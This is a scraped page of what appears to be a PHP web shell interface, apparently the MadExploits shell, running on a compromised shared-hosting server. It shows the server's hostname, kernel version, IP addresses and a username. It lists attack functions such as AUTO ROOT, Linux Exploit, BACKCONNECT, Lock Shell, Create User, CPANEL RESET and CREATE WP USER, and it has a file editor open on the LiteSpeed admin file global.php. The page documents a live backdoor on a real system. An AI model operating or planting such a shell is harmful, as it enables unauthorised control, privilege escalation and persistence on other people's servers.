Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.27
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
admin /
html.6.2.1 /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
auth.php
269
B
-rw-r--r--
global.php
1.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : global.php
<?php ob_start(); // just in case header("Expires: -1"); //ie busting header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0"); header("Pragma: no-cache"); header("X-Frame-Options: SAMEORIGIN"); header("Content-Security-Policy: frame-ancestors 'self'"); header("Referrer-Policy: same-origin"); header("X-Content-Type-Options: nosniff"); //set auto include path...get rid of all path headaches ini_set('include_path', $_SERVER['LS_SERVER_ROOT'] . 'admin/html/classes/:' . $_SERVER['LS_SERVER_ROOT'] . 'admin/html/classes/ws/:' . $_SERVER['LS_SERVER_ROOT'] . 'admin/html/includes/:.'); // **PREVENTING SESSION HIJACKING** // Prevents javascript XSS attacks aimed to steal the session ID ini_set('session.cookie_httponly', 1); // **PREVENTING SESSION FIXATION** // Session ID cannot be passed through URLs ini_set('session.use_only_cookies', 1); // Uses a secure connection (HTTPS) if possible if (isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] == 'on')) { ini_set('session.cookie_secure', 1); } date_default_timezone_set('America/New_York'); spl_autoload_register( function ($class) { include $class . '.php'; });
Close